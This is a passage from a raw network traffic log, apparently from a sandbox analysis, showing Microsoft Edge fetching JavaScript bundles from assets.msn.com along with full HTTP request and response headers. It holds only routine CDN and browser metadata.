sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: tU9JpvL3qvHWNBN6t0pdjA==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6E33AC8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 34667db4-b01e-006b-295d-146aad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608168,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=30, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d168
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/office-feed.d68a99b40ee038752a3a.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/office-feed.d68a99b40ee038752a3a.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: +DF5L092+8kUeVG7VI2juQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF5199344
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9d6a9a2d-101e-00d9-165a-144aed000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608224,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d1a0
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/on-this-day-card-small.5b52f49b4016d391b40d.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/on-this-day-card-small.5b52f49b4016d391b40d.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: kAmMjSY/aTVsaHrLBEqaSQ==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07B1135A0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6be8696e-c01e-00f0-1c03-13a8cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608428,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d26c
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/on-this-day-card-wc.7ea4a6a1d547b30a4c75.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/on-this-day-card-wc.7ea4a6a1d547b30a4c75.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 76TSAE4slbgA5xioQhrhjw==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF5D4D886
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5f174-a01e-00f6-565a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608500,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d2b4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/oneTrustCookieConsentData.d8f0da7ae9be65bc00d8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/oneTrustCookieConsentData.d8f0da7ae9be65bc00d8.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: kGzEgAjiFN/S4HiH8yrlSw==
last-modified: Tue, 20 Dec 2022 23:56:06 GMT
etag: 0x8DAE2E5C26B88E1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 07ad1d2a-e01e-0022-5730-18caaf000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608577,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d301
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/overlay-wc.621c3dc21025ba29d49b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/overlay-wc.621c3dc21025ba29d49b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 1tIZlFtMkX5+fpaoyB0KOQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF599FB0C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: aab6cd30-601e-00fa-3e5c-14a6d8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608672,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d360
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/page-error-handling.a13f9c27d3e8a06981e5.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/page-error-handling.a13f9c27d3e8a06981e5.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: rbQLL0fLvEzsHVO9nJOthw==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7CE89C2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2fe5f27e-a01e-00f6-0e5a-1452c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608709,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d385
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/page-error-handling.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: OnlGsjx7ezEiCltcDq94fg==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C2CF6C32
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 60c9201f-f01e-00c7-3f08-1858d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:38 GMT
content-length: 188
akamai-request-bc: [a=88.221.24.111,b=431608750,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d3ae
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/page.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Q1/hlP9iZQtsjp+OsP+hSA==
last-modified: Tue, 20 Dec 2022 23:56:01 GMT
etag: 0x8DAE2E5BF94424D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8fd8f048-001e-003c-04f6-16d890000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:38 GMT
content-length: 13066
akamai-request-bc: [a=88.221.24.111,b=431608794,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d3da
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/personalize-nav-button.89ca031a383b5fa6f5a8.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/personalize-nav-button.89ca031a383b5fa6f5a8.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: YVpk75/nQGz6rVnfVv3r1A==
last-modified: Tue, 20 Dec 2022 05:42:21 GMT
etag: 0x8DAE24CF6EC3A28
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dd187a98-901e-00c1-185d-14a2de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608846,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d40e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/pivots-nav-edgenext.5d64d9feb95449f80d88.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/pivots-nav-edgenext.5d64d9feb95449f80d88.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: aGVB/7dgweEb5LtbfDgeCA==
last-modified: Fri, 16 Dec 2022 21:57:04 GMT
etag: 0x8DADFB078057928
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5d64f69c-e01e-0066-0b0a-13b5b6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608929,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d461
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/polls-card-wc.b80021107ab8b2e0abf4.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/polls-card-wc.b80021107ab8b2e0abf4.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qmWuM8VI/ooFCb++LLCJWA==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1E8144B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 0258bf71-b01e-003f-1b00-19a596000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431608977,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d491
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/poweredby-legend-wc.574aab6c8b55c86b3a97.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/poweredby-legend-wc.574aab6c8b55c86b3a97.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6rRUFjvSsC5IAUoCtfMrqQ==
last-modified: Fri, 16 Dec 2022 21:57:10 GMT
etag: 0x8DADFB07B94351D
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f2960abe-601e-0016-6974-1347b6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431609042,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d4d2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/poweredByData.8d934c50f38e418267ab.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/poweredByData.8d934c50f38e418267ab.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: rbE1X6pV5u2+0WI+X4BMXA==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF55B748A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8539410f-f01e-002b-655c-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431609102,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=22, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d50e
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/premium-profile-promo-card.022e4d920b178401e531.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/premium-profile-promo-card.022e4d920b178401e531.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Nc6wVbqOZN9aiLs1SFJnxQ==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF59A4920
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f3e072fb-101e-00f5-345b-142fc7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431609131,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d52b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/prism-carousel-card.bba6c3a7f2a5a718ccb2.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/prism-carousel-card.bba6c3a7f2a5a718ccb2.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: UBABkEPKjgRcidCOh96DAQ==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF76AA676
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8543713c-f01e-002b-2f5c-14b9bc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:38 GMT
akamai-request-bc: [a=88.221.24.111,b=431609206,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9d576
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/prism-sd-card.3a9e567c3234fbb13ff6.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/prism-sd-card.3a9e567c3234fbb13ff6.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 5ZOCbtYuLDFQGP8Wd/cHKA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF7D7B029
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 74578c49-901e-0011-545b-1496b8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:39 GMT
akamai-request-bc: [a=88.221.24.111,b=431609344,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
